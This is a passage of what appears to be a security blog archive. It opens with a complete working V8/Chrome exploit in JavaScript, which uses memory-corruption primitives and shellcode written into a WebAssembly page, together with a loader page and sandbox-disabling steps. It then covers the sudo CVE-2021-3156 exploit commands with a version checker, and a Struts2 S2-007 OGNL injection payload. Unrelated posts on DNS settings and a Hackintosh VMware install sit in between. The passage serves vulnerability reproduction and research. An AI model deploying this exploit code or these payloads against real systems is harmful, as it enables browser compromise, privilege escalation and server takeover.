<h4 id="漏洞复现"><a href="#漏洞复现" class="headerlink" title="漏洞复现"></a>Vulnerability reproduction</h4><p>exploit js file</p>
<figure class="highlight lsl"><table><tr><td class="code"><pre><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">/*</span></span><br><span class="line"><span class="comment">BSD 2-Clause License</span></span><br><span class="line"><span class="comment">Copyright (c) 2021, rajvardhan agarwal</span></span><br><span class="line"><span class="comment">All rights reserved.</span></span><br><span class="line"><span class="comment">Redistribution and use in source and binary forms, with or without</span></span><br><span class="line"><span class="comment">modification, are permitted provided that the following conditions are met:</span></span><br><span class="line"><span class="comment">1. Redistributions of source code must retain the above copyright notice, this</span></span><br><span class="line"><span class="comment"> list of conditions and the following disclaimer.</span></span><br><span class="line"><span class="comment">2. Redistributions in binary form must reproduce the above copyright notice,</span></span><br><span class="line"><span class="comment"> this list of conditions and the following disclaimer in the documentation</span></span><br><span class="line"><span class="comment"> and/or other materials provided with the distribution.</span></span><br><span class="line"><span class="comment">THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS"</span></span><br><span class="line"><span class="comment">AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE</span></span><br><span class="line"><span class="comment">IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE</span></span><br><span class="line"><span class="comment">DISCLAIMED. 
IN NO EVENT SHALL THE COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE</span></span><br><span class="line"><span class="comment">FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL</span></span><br><span class="line"><span class="comment">DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR</span></span><br><span class="line"><span class="comment">SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER</span></span><br><span class="line"><span class="comment">CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY,</span></span><br><span class="line"><span class="comment">OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE</span></span><br><span class="line"><span class="comment">OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.</span></span><br><span class="line"><span class="comment">*/</span></span><br><span class="line"></span><br><span class="line">var wasm_code = new Uint8Array([<span class="number">0</span>,<span class="number">97</span>,<span class="number">115</span>,<span class="number">109</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">133</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">96</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">127</span>,<span class="number">3</span>,<span class="number">130</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">4</span>,<span class="number">132</span>,<span class="number">128</span>,<span class="number">128</span>,<span 
class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">112</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">5</span>,<span class="number">131</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">6</span>,<span class="number">129</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">7</span>,<span class="number">145</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">2</span>,<span class="number">6</span>,<span class="number">109</span>,<span class="number">101</span>,<span class="number">109</span>,<span class="number">111</span>,<span class="number">114</span>,<span class="number">121</span>,<span class="number">2</span>,<span class="number">0</span>,<span class="number">4</span>,<span class="number">109</span>,<span class="number">97</span>,<span class="number">105</span>,<span class="number">110</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">10</span>,<span class="number">138</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">1</span>,<span class="number">132</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">128</span>,<span class="number">0</span>,<span class="number">0</span>,<span class="number">65</span>,<span class="number">42</span>,<span class="number">11</span>])</span><br><span class="line">var wasm_mod = new WebAssembly.Module(wasm_code);</span><br><span 
class="line">var wasm_instance = new WebAssembly.Instance(wasm_mod);</span><br><span class="line">var f = wasm_instance.exports.main;</span><br><span class="line"></span><br><span class="line">var buf = new ArrayBuffer(<span class="number">8</span>);</span><br><span class="line">var f64_buf = new Float64Array(buf);</span><br><span class="line">var u64_buf = new Uint32Array(buf);</span><br><span class="line">let buf2 = new ArrayBuffer(<span class="number">0x150</span>);</span><br><span class="line"></span><br><span class="line">function ftoi(val) {</span><br><span class="line"> f64_buf[<span class="number">0</span>] = val;</span><br><span class="line"> return BigInt(u64_buf[<span class="number">0</span>]) + (BigInt(u64_buf[<span class="number">1</span>]) << <span class="number">32</span>n);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">function itof(val) {</span><br><span class="line"> u64_buf[<span class="number">0</span>] = Number(val & <span class="number">0xffffffff</span>n);</span><br><span class="line"> u64_buf[<span class="number">1</span>] = Number(val >> <span class="number">32</span>n);</span><br><span class="line"> return f64_buf[<span class="number">0</span>];</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">const _arr = new Uint32Array([<span class="number">2</span>**<span class="number">31</span>]);</span><br><span class="line"></span><br><span class="line">function foo(a) {</span><br><span class="line"> var x = <span class="number">1</span>;</span><br><span class="line"> x = (_arr[<span class="number">0</span>] ^ <span class="number">0</span>) + <span class="number">1</span>;</span><br><span class="line"></span><br><span class="line"> x = Math.abs(x);</span><br><span class="line"> x -= <span class="number">2147483647</span>;</span><br><span class="line"> x = Math.max(x, <span class="number">0</span>);</span><br><span class="line"></span><br><span class="line"> x -= 
<span class="number">1</span>;</span><br><span class="line"> if(x==<span class="number">-1</span>) x = <span class="number">0</span>;</span><br><span class="line"></span><br><span class="line"> var arr = new Array(x);</span><br><span class="line"> arr.shift();</span><br><span class="line"> var cor = [<span class="number">1.1</span>, <span class="number">1.2</span>, <span class="number">1.3</span>];</span><br><span class="line"></span><br><span class="line"> return [arr, cor];</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">for(var i=<span class="number">0</span>;i<<span class="number">0x3000</span>;++i)</span><br><span class="line"> foo(true);</span><br><span class="line"></span><br><span class="line">var x = foo(false);</span><br><span class="line">var arr = x[<span class="number">0</span>];</span><br><span class="line">var cor = x[<span class="number">1</span>];</span><br><span class="line"></span><br><span class="line">const idx = <span class="number">6</span>;</span><br><span class="line">arr[idx+<span class="number">10</span>] = <span class="number">0x4242</span>;</span><br><span class="line"></span><br><span class="line">function addrof(k) {</span><br><span class="line"> arr[idx+<span class="number">1</span>] = k;</span><br><span class="line"> return ftoi(cor[<span class="number">0</span>]) & <span class="number">0xffffffff</span>n;</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">function fakeobj(k) {</span><br><span class="line"> cor[<span class="number">0</span>] = itof(k);</span><br><span class="line"> return arr[idx+<span class="number">1</span>];</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">var float_array_map = ftoi(cor[<span class="number">3</span>]);</span><br><span class="line"></span><br><span class="line">var arr2 = [itof(float_array_map), <span class="number">1.2</span>, <span class="number">2.3</span>, <span 
class="number">3.4</span>];</span><br><span class="line">var fake = fakeobj(addrof(arr2) + <span class="number">0x20</span>n);</span><br><span class="line"></span><br><span class="line">function arbread(addr) {</span><br><span class="line"> if (addr % <span class="number">2</span>n == <span class="number">0</span>) {</span><br><span class="line"> addr += <span class="number">1</span>n;</span><br><span class="line"> }</span><br><span class="line"> arr2[<span class="number">1</span>] = itof((<span class="number">2</span>n << <span class="number">32</span>n) + addr - <span class="number">8</span>n);</span><br><span class="line"> return (fake[<span class="number">0</span>]);</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">function arbwrite(addr, val) {</span><br><span class="line"> if (addr % <span class="number">2</span>n == <span class="number">0</span>) {</span><br><span class="line"> addr += <span class="number">1</span>n;</span><br><span class="line"> }</span><br><span class="line"> arr2[<span class="number">1</span>] = itof((<span class="number">2</span>n << <span class="number">32</span>n) + addr - <span class="number">8</span>n);</span><br><span class="line"> fake[<span class="number">0</span>] = itof(BigInt(val));</span><br><span class="line">}</span><br><span class="line"></span><br><span class="line">function copy_shellcode(addr, shellcode) {</span><br><span class="line"> let dataview = new DataView(buf2);</span><br><span class="line"> let buf_addr = addrof(buf2);</span><br><span class="line"> let backing_store_addr = buf_addr + <span class="number">0x14</span>n;</span><br><span class="line"> arbwrite(backing_store_addr, addr);</span><br><span class="line"></span><br><span class="line"> for (let i = <span class="number">0</span>; i < shellcode.length; i++) {</span><br><span class="line"> dataview.setUint32(<span class="number">4</span>*i, shellcode[i], true);</span><br><span class="line"> }</span><br><span 
class="line">}</span><br><span class="line"></span><br><span class="line">var rwx_page_addr = ftoi(arbread(addrof(wasm_instance) + <span class="number">0x68</span>n));</span><br><span class="line">console.log(<span class="string">"[+] Address of rwx page: "</span> + rwx_page_addr.toString(<span class="number">16</span>));</span><br><span class="line">var shellcode = [<span class="number">3833809148</span>,<span class="number">12642544</span>,<span class="number">1363214336</span>,<span class="number">1364348993</span>,<span class="number">3526445142</span>,<span class="number">1384859749</span>,<span class="number">1384859744</span>,<span class="number">1384859672</span>,<span class="number">1921730592</span>,<span class="number">3071232080</span>,<span class="number">827148874</span>,<span class="number">3224455369</span>,<span class="number">2086747308</span>,<span class="number">1092627458</span>,<span class="number">1091422657</span>,<span class="number">3991060737</span>,<span class="number">1213284690</span>,<span class="number">2334151307</span>,<span class="number">21511234</span>,<span class="number">2290125776</span>,<span class="number">1207959552</span>,<span class="number">1735704709</span>,<span class="number">1355809096</span>,<span class="number">1142442123</span>,<span class="number">1226850443</span>,<span class="number">1457770497</span>,<span class="number">1103757128</span>,<span class="number">1216885899</span>,<span class="number">827184641</span>,<span class="number">3224455369</span>,<span class="number">3384885676</span>,<span class="number">3238084877</span>,<span class="number">4051034168</span>,<span class="number">608961356</span>,<span class="number">3510191368</span>,<span class="number">1146673269</span>,<span class="number">1227112587</span>,<span class="number">1097256961</span>,<span class="number">1145572491</span>,<span class="number">1226588299</span>,<span class="number">2336346113</span>,<span 
class="number">21530628</span>,<span class="number">1096303056</span>,<span class="number">1515806296</span>,<span class="number">1497454657</span>,<span class="number">2202556993</span>,<span class="number">1379999980</span>,<span class="number">1096343807</span>,<span class="number">2336774745</span>,<span class="number">4283951378</span>,<span class="number">1214119935</span>,<span class="number">442</span>,<span class="number">0</span>,<span class="number">2374846464</span>,<span class="number">257</span>,<span class="number">2335291969</span>,<span class="number">3590293359</span>,<span class="number">2729832635</span>,<span class="number">2797224278</span>,<span class="number">4288527765</span>,<span class="number">3296938197</span>,<span class="number">2080783400</span>,<span class="number">3774578698</span>,<span class="number">1203438965</span>,<span class="number">1785688595</span>,<span class="number">2302761216</span>,<span class="number">1674969050</span>,<span class="number">778267745</span>,<span class="number">6649957</span>];</span><br><span class="line">copy_shellcode(rwx_page_addr, shellcode);</span><br><span class="line">f();</span><br></pre></td></tr></table></figure>
<p>HTML file</p>
<figure class="highlight xml"><table><tr><td class="code"><pre><span class="line"><span class="tag"><<span class="name">script</span> <span class="attr">src</span>=<span class="string">"exploit.js"</span>></span><span class="tag"></<span class="name">script</span>></span> // load the exploit.js file</span><br></pre></td></tr></table></figure>
<p>Disable the browser sandbox</p>
<figure class="highlight taggerscript"><table><tr><td class="code"><pre><span class="line"># Quit the browser process first, then launch it with:</span><br><span class="line">"C:<span class="symbol">\P</span>rogram Files (x86)<span class="symbol">\G</span>oogle<span class="symbol">\C</span>hrome<span class="symbol">\A</span>pplication<span class="symbol">\c</span>hrome.exe" -no-sandbox</span><br><span class="line">or</span><br><span class="line">"C:<span class="symbol">\P</span>rogram Files (x86)<span class="symbol">\G</span>oogle<span class="symbol">\C</span>hrome<span class="symbol">\A</span>pplication<span class="symbol">\c</span>hrome.exe" --args --no-sandbox</span><br></pre></td></tr></table></figure>
<p><img src="/img/chrome%200day/image-20210413160904379.png" alt="image-20210413160904379"></p>
<p>Open the exploit.html page and the calculator pops up (the Edge browser is affected as well).</p>
<p><img src="/img/chrome%200day/image-20210413160943095.png" alt="image-20210413160943095"></p>
<h4 id="参考"><a href="#参考" class="headerlink" title="参考"></a>References</h4><p><a href="https://github.com/r4j0x00/exploits/tree/master/chrome-0day" target="_blank" rel="noopener">https://github.com/r4j0x00/exploits/tree/master/chrome-0day</a></p>
<p><a href="https://mp.weixin.qq.com/s/dZl_Urk8cOJ1Qbe16HBFGQ" target="_blank" rel="noopener">https://mp.weixin.qq.com/s/dZl_Urk8cOJ1Qbe16HBFGQ</a></p>
]]></content>
<tags>
<tag>Vulnerability Reproduction</tag>
</tags>
</entry>
<entry>
<title>Linux sudo Privilege Escalation (CVE-2021-3156) Vulnerability Reproduction</title>
<url>/2021/02/04/Linux-sudo%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%EF%BC%88CVE-2021-3156%EF%BC%89/</url>
<content><![CDATA[<p>This article is for technical research and discussion only. Use for illegal purposes is strictly prohibited; you alone bear any consequences that result.</p>
<div style="text-align: right"> 小维</div>
<h4 id="漏洞概述"><a href="#漏洞概述" class="headerlink" title="漏洞概述"></a>Vulnerability Overview</h4><p>Sudo is a powerful tool that allows ordinary users to run commands with root privileges; most Unix- and Linux-based operating systems include sudo.</p>
<p>On 26 January 2021, a heap-based buffer overflow vulnerability in sudo was disclosed (CVE-2021-3156, named "Baron Samedit"), which can lead to local privilege escalation.</p>
<p>When sudo runs a command in shell mode via the -s or -i command-line option, it escapes special characters in the command's arguments with a backslash. But when sudoedit is run with the -s or -i flag, no escaping is actually performed, which can lead to a buffer overflow. As long as a sudoers file exists (usually /etc/sudoers), an attacker can exploit sudo from an ordinary local user account to obtain root privileges on the system.</p>
<p>Security researchers publicly disclosed the vulnerability on 26 January and stated that it had lain hidden for nearly ten years.</p>
<a id="more"></a>
<h4 id="受影响版本"><a href="#受影响版本" class="headerlink" title="受影响版本"></a>Affected Versions</h4><figure class="highlight angelscript"><table><tr><td class="code"><pre><span class="line">Sudo <span class="number">1.8</span><span class="number">.2</span> - <span class="number">1.8</span><span class="number">.31</span>p2</span><br><span class="line">Sudo <span class="number">1.9</span><span class="number">.0</span> - <span class="number">1.9</span><span class="number">.5</span>p1</span><br></pre></td></tr></table></figure>
<h4 id="检测方法"><a href="#检测方法" class="headerlink" title="检测方法"></a>Detection Method</h4><p>Log in to the system as a non-root user and run the <code>sudoedit -s /</code> command.</p>
<p>If it responds with an error starting with <code>sudoedit:</code>, the vulnerability is present.</p>
<p><img src="/img/Linux-sudo%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%EF%BC%88CVE-2021-3156%EF%BC%89/image-20210202103228116.png" alt="image-20210202103228116"></p>
<p>If it responds with an error starting with <code>usage:</code>, the patch has taken effect.</p>
<p><img src="/img/Linux-sudo%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%EF%BC%88CVE-2021-3156%EF%BC%89/image-20210202114538438.png" alt="image-20210202114538438"></p>
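<p>The two checks above (the affected version ranges and the <code>sudoedit -s /</code> response) as an added Python example, not code from the original post or from the sudo project. It parses the banner printed by <code>sudo --version</code>, compares it against the ranges listed in the affected-versions section, and classifies the first line printed by <code>sudoedit -s /</code>; the sample banner and output lines are constructed.</p>

```python
"""Added example (not from the original post or the sudo project): offline
checks for the two CVE-2021-3156 indicators described above."""
import re
import shutil
import subprocess
from typing import Optional, Tuple

VersionKey = Tuple[int, int, int, int]

# Affected ranges (inclusive), as listed in the affected-versions section.
AFFECTED_RANGES = (("1.8.2", "1.8.31p2"), ("1.9.0", "1.9.5p1"))

_VERSION_RE = re.compile(r"^(\d+)\.(\d+)(?:\.(\d+))?(?:p(\d+))?$")


def parse_sudo_version(ver: str) -> VersionKey:
    """Turn '1.8.31p2' into a comparable tuple (1, 8, 31, 2). A missing
    third component or 'p' suffix counts as 0, so 1.8.31 < 1.8.31p1."""
    m = _VERSION_RE.match(ver.strip())
    if not m:
        raise ValueError(f"unrecognised sudo version: {ver!r}")
    major, minor, patch, plevel = m.groups()
    return (int(major), int(minor), int(patch or 0), int(plevel or 0))


def version_from_banner(banner: str) -> Optional[str]:
    """Extract the version from `sudo --version` output, whose first line
    reads 'Sudo version 1.8.31p2'."""
    m = re.search(r"Sudo version (\S+)", banner)
    return m.group(1) if m else None


def version_is_affected(ver: str) -> bool:
    """True when the version falls inside one of the affected ranges."""
    key = parse_sudo_version(ver)
    return any(parse_sudo_version(lo) <= key <= parse_sudo_version(hi)
               for lo, hi in AFFECTED_RANGES)


def classify_sudoedit_output(first_line: str) -> str:
    """Map the first line printed by `sudoedit -s /` to the verdicts given
    in the detection method: 'sudoedit:' -> vulnerable, 'usage:' -> patched."""
    line = first_line.lstrip()
    if line.startswith("sudoedit:"):
        return "vulnerable"
    if line.startswith("usage:"):
        return "patched"
    return "unknown"


def live_check(timeout: float = 10.0) -> dict:
    """Run both checks on this host; used only from the command line."""
    result = {"version": None, "version_affected": None, "sudoedit": "unknown"}
    if shutil.which("sudo"):
        banner = subprocess.run(["sudo", "--version"], capture_output=True,
                                text=True, check=False).stdout
        ver = version_from_banner(banner)
        if ver:
            result["version"] = ver
            result["version_affected"] = version_is_affected(ver)
    if shutil.which("sudoedit"):
        try:
            # stdin is closed and a timeout applied so that a password
            # prompt, should one appear, fails instead of blocking.
            proc = subprocess.run(["sudoedit", "-s", "/"], capture_output=True,
                                  text=True, check=False, timeout=timeout,
                                  stdin=subprocess.DEVNULL)
            lines = (proc.stderr or proc.stdout).splitlines()
            result["sudoedit"] = classify_sudoedit_output(lines[0] if lines else "")
        except subprocess.TimeoutExpired:
            pass
    return result


if __name__ == "__main__":
    print(live_check())
```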
<h4 id="漏洞利用"><a href="#漏洞利用" class="headerlink" title="漏洞利用"></a>Exploitation</h4><figure class="highlight sh"><table><tr><td class="code"><pre><span class="line">git <span class="built_in">clone</span> https://github.com/blasty/CVE-2021-3156.git</span><br><span class="line"><span class="built_in">cd</span> CVE-2021-3156</span><br><span class="line">make</span><br><span class="line">./sudo-hax-me<span class="_">-a</span>-sandwich <target_number></span><br></pre></td></tr></table></figure>
<h5 id="kali-Linux-测试"><a href="#kali-Linux-测试" class="headerlink" title="kali Linux 测试"></a>Kali Linux Test</h5><p><img src="/img/Linux-sudo%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%EF%BC%88CVE-2021-3156%EF%BC%89/image-20210202104425241.png" alt="image-20210202104425241"></p>
<h4 id="修复建议"><a href="#修复建议" class="headerlink" title="修复建议"></a>Fix Recommendations</h4><p>The vendor has fixed this vulnerability in the new sudo release 1.9.5p2; affected users should upgrade as soon as possible.</p>
<p>Official download link: <a href="https://www.sudo.ws/download.html" target="_blank" rel="noopener">https://www.sudo.ws/download.html</a></p>
<p><img src="/img/Linux-sudo%E6%9D%83%E9%99%90%E6%8F%90%E5%8D%87%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0%EF%BC%88CVE-2021-3156%EF%BC%89/image-20210202114622883.png" alt="image-20210202114622883"></p>
<h4 id="参考"><a href="#参考" class="headerlink" title="参考"></a>References</h4><p><a href="https://www.sudo.ws/alerts/unescape_overflow.html" target="_blank" rel="noopener">https://www.sudo.ws/alerts/unescape_overflow.html</a></p>
<p><a href="http://blog.nsfocus.net/cve-2021-3156/" target="_blank" rel="noopener">http://blog.nsfocus.net/cve-2021-3156/</a></p>
<p><a href="https://github.com/blasty/CVE-2021-3156" target="_blank" rel="noopener">https://github.com/blasty/CVE-2021-3156</a></p>
]]></content>
<tags>
<tag>Vulnerability Reproduction</tag>
</tags>
</entry>
<entry>
<title>Fixing *.github.io Being Unreachable from Mainland China</title>
<url>/2021/02/01/%E8%A7%A3%E5%86%B3%E5%9B%BD%E5%86%85%E6%97%A0%E6%B3%95%E8%AE%BF%E9%97%AE-.github.io/</url>
<content><![CDATA[<p><img src="/img/%E8%A7%A3%E5%86%B3%E5%9B%BD%E5%86%85%E6%97%A0%E6%B3%95%E8%AE%BF%E9%97%AE-.github.io/image-20210201110915058.png" alt="image-20210201110915058"></p>
<a id="more"></a>
<p>Solution:</p>
<p>Change the DNS server: 208.67.222.222 (OpenDNS) resolves it correctly, so set it as the alternate DNS server.</p>
<p>Windows steps:</p>
<figure class="highlight angelscript"><table><tr><td class="code"><pre><span class="line">① Win+R, enter ncpa.cpl</span><br><span class="line">② Right-click the relevant network connection and choose Properties</span><br><span class="line">③ Select Internet Protocol Version <span class="number">4</span> (TCP/IPv4)</span><br><span class="line">④ Select "Use the following DNS server addresses"</span><br><span class="line">⑤ Enter <span class="number">208.67</span><span class="number">.222</span><span class="number">.222</span> (can be set as the preferred or the alternate server)</span><br><span class="line">⑥ Click OK and save</span><br><span class="line"></span><br><span class="line">Note: if it is still unreachable, flush the DNS cache; on Windows: ipconfig/flushdns</span><br></pre></td></tr></table></figure>
<p><img src="/img/%E8%A7%A3%E5%86%B3%E5%9B%BD%E5%86%85%E6%97%A0%E6%B3%95%E8%AE%BF%E9%97%AE-.github.io/image-20210201110827948.png" alt="image-20210201110827948"></p>
<p><img src="/img/%E8%A7%A3%E5%86%B3%E5%9B%BD%E5%86%85%E6%97%A0%E6%B3%95%E8%AE%BF%E9%97%AE-.github.io/image-20210201111603731.png" alt="image-20210201111603731"></p>
]]></content>
</entry>
<entry>
<title>Installing a Hackintosh System (MacOS) in VMware</title>
<url>/2021/01/29/VMware-%E5%AE%89%E8%A3%85%E9%BB%91%E8%8B%B9%E6%9E%9C%E7%B3%BB%E7%BB%9F(MacOS)/</url>
<content><![CDATA[<h4 id="写在前面"><a href="#写在前面" class="headerlink" title="写在前面"></a>Preface</h4><p>I often need to test some Mac software, so I decided to install a Hackintosh in VMware to test that software.</p>
<h4 id="环境介绍"><a href="#环境介绍" class="headerlink" title="环境介绍"></a>Environment</h4><figure class="highlight angelscript"><table><tr><td class="code"><pre><span class="line">Operating system: Windows <span class="number">10</span> <span class="number">10.0</span><span class="number">.18363</span></span><br><span class="line">VMware version: VMware® Workstation <span class="number">15</span> Pro <span class="number">15.5</span><span class="number">.2</span> build<span class="number">-15785246</span></span><br></pre></td></tr></table></figure>
<a id="more"></a>
<h4 id="安装"><a href="#安装" class="headerlink" title="安装"></a>Installation</h4><h5 id="准备工作"><a href="#准备工作" class="headerlink" title="准备工作"></a>Preparation</h5><figure class="highlight angelscript"><table><tr><td class="code"><pre><span class="line">MK-Unlocker-VM15<span class="number">.5</span>.zip (Unlocker patch, supports VMware <span class="number">15.5</span><span class="number">.5</span>)</span><br><span class="line">macOS.Catalina<span class="number">.10</span><span class="number">.15</span><span class="number">.5</span><span class="number">.01</span>.LY.iso (macOS image)</span><br><span class="line">Download: link: https:<span class="comment">//pan.baidu.com/s/1SOUCyZ0Ys7PQcxQpAhKTHg extraction code: down</span></span><br></pre></td></tr></table></figure>
<h5 id="VMware虚拟机安装"><a href="#VMware虚拟机安装" class="headerlink" title="VMware虚拟机安装"></a>Installing VMware</h5><p>Installing VMware itself is not covered here; download and install it on your own.</p>
<h5 id="解锁"><a href="#解锁" class="headerlink" title="解锁"></a>Unlock</h5><p>By default VMware cannot recognize Apple system images, so the Unlocker tool is needed: extract MK-Unlocker-VM15.5.zip, then run the win-install.cmd script as administrator.</p>
<p><img src="/img/VMware-%E5%AE%89%E8%A3%85%E9%BB%91%E8%8B%B9%E6%9E%9C%E7%B3%BB%E7%BB%9F(MacOS)/image-20210126172049200.png" alt="image-20210126172049200"></p>
<p>Wait for it to finish.</p>
<p><img src="/img/VMware-%E5%AE%89%E8%A3%85%E9%BB%91%E8%8B%B9%E6%9E%9C%E7%B3%BB%E7%BB%9F(MacOS)/image-20210126172832152.png" alt="image-20210126172832152"></p>
<h5 id="MacOS"><a href="#MacOS" class="headerlink" title="MacOS"></a>MacOS</h5><p>Open VMware, create a new virtual machine, select macOS.Catalina.10.15.5.01.LY.iso, and choose the Apple Mac OS X option (this option is absent if VMware has not been unlocked); then accept the defaults or configure it yourself until finished.</p>
<p><img src="/img/VMware-%E5%AE%89%E8%A3%85%E9%BB%91%E8%8B%B9%E6%9E%9C%E7%B3%BB%E7%BB%9F(MacOS)/image-20210126173349851.png" alt="image-20210126173349851"></p>
<p><img src="/img/VMware-%E5%AE%89%E8%A3%85%E9%BB%91%E8%8B%B9%E6%9E%9C%E7%B3%BB%E7%BB%9F(MacOS)/image-20210126173627968.png" alt="image-20210126173627968"></p>
<p>After it is created, do not start it right away: first locate the directory where the virtual machine files are saved, find the file with the .vmx extension, edit it, and add on the last line</p>
<p><code>smc.version = 0</code>, then save and exit.</p>
<p><img src="/img/VMware-%E5%AE%89%E8%A3%85%E9%BB%91%E8%8B%B9%E6%9E%9C%E7%B3%BB%E7%BB%9F(MacOS)/image-20210126174636509.png" alt="image-20210126174636509"></p>
<p>Start the virtual machine</p>
<p><img src="/img/VMware-%E5%AE%89%E8%A3%85%E9%BB%91%E8%8B%B9%E6%9E%9C%E7%B3%BB%E7%BB%9F(MacOS)/image-20210126174747413.png" alt="image-20210126174747413"></p>
<p>Choose a language; here choose "Simplified Chinese" and click the arrow to continue</p>
<p><img src="/img/VMware-%E5%AE%89%E8%A3%85%E9%BB%91%E8%8B%B9%E6%9E%9C%E7%B3%BB%E7%BB%9F(MacOS)/image-20210126175117143.png" alt="image-20210126175117143"></p>
<p>Choose "Disk Utility" and click "Continue" to partition the disk; note that the disk on which the system is installed must be larger than 25 GB.</p>
<p><img src="/img/VMware-%E5%AE%89%E8%A3%85%E9%BB%91%E8%8B%B9%E6%9E%9C%E7%B3%BB%E7%BB%9F(MacOS)/image-20210126175242992.png" alt="image-20210126175242992"></p>
<p><img src="/img/VMware-%E5%AE%89%E8%A3%85%E9%BB%91%E8%8B%B9%E6%9E%9C%E7%B3%BB%E7%BB%9F(MacOS)/image-20210126180200605.png" alt="image-20210126180200605"></p>
<p><img src="/img/VMware-%E5%AE%89%E8%A3%85%E9%BB%91%E8%8B%B9%E6%9E%9C%E7%B3%BB%E7%BB%9F(MacOS)/image-20210126180544001.png" alt="image-20210126180544001"></p>
<p><img src="/img/VMware-%E5%AE%89%E8%A3%85%E9%BB%91%E8%8B%B9%E6%9E%9C%E7%B3%BB%E7%BB%9F(MacOS)/image-20210126185615418.png" alt="image-20210126185615418"></p>
<p>Click "Quit Disk Utility"</p>
<p><img src="/img/VMware-%E5%AE%89%E8%A3%85%E9%BB%91%E8%8B%B9%E6%9E%9C%E7%B3%BB%E7%BB%9F(MacOS)/image-20210126182728141.png" alt="image-20210126182728141"></p>
<p>Choose "Install macOS" and click "Continue"</p>
<p><img src="/img/VMware-%E5%AE%89%E8%A3%85%E9%BB%91%E8%8B%B9%E6%9E%9C%E7%B3%BB%E7%BB%9F(MacOS)/image-20210126181159749.png" alt="image-20210126181159749"></p>
<p><img src="/img/VMware-%E5%AE%89%E8%A3%85%E9%BB%91%E8%8B%B9%E6%9E%9C%E7%B3%BB%E7%BB%9F(MacOS)/image-20210126183123501.png" alt="image-20210126183123501"></p>
<p>After installation completes, the welcome and setup screens appear; after a few settings you are in macOS.</p>
<p><img src="/img/VMware-%E5%AE%89%E8%A3%85%E9%BB%91%E8%8B%B9%E6%9E%9C%E7%B3%BB%E7%BB%9F(MacOS)/image-20210126194401893.png" alt="image-20210126194401893"></p>
<h4 id="参考"><a href="#参考" class="headerlink" title="参考"></a>References</h4><p><a href="https://www.cnblogs.com/deshun/p/10652385.html" target="_blank" rel="noopener">https://www.cnblogs.com/deshun/p/10652385.html</a></p>
]]></content>
</entry>
<entry>
<title>Struts2-007 Vulnerability Analysis</title>
<url>/2020/12/28/Struts2-007%E6%BC%8F%E6%B4%9E%E5%88%86%E6%9E%90/</url>
<content><![CDATA[<h4 id="漏洞概要"><a href="#漏洞概要" class="headerlink" title="漏洞概要"></a>Vulnerability Summary</h4><p>See the official security bulletin: <a href="https://cwiki.apache.org/confluence/display/WW/S2-007" target="_blank" rel="noopener">https://cwiki.apache.org/confluence/display/WW/S2-007</a></p>
<h4 id="漏洞分析"><a href="#漏洞分析" class="headerlink" title="漏洞分析"></a>Vulnerability Analysis</h4><p>The exploitation scenario for S2-007 is fairly restrictive: a validation rule must be configured for the submitted parameter, and it is during type conversion of that parameter that <code>OGNL</code> expression execution occurs.</p>
<p>The cause is that in Struts2 we can set validation rules for each form field; when type conversion fails, the value is concatenated into a string in an unsafe way, and closing the quote causes it to be parsed as <code>OGNL</code> syntax.</p>
<a id="more"></a>
<p>Simple PoC</p>
<figure class="highlight 1c"><table><tr><td class="code"><pre><span class="line">'+(#application)+'</span><br></pre></td></tr></table></figure>
<p>In Struts2, HTTP request data is injected into the properties of the business Action. These properties can be of any type, while only String data can be obtained over HTTP, so type conversion takes place here. The conversion rules can be defined in an XML file. For example, here I define a <code>UserAction</code> class with an <code>Integer</code> property <code>age</code>, and restrict its range to <code>1-150</code>.</p>
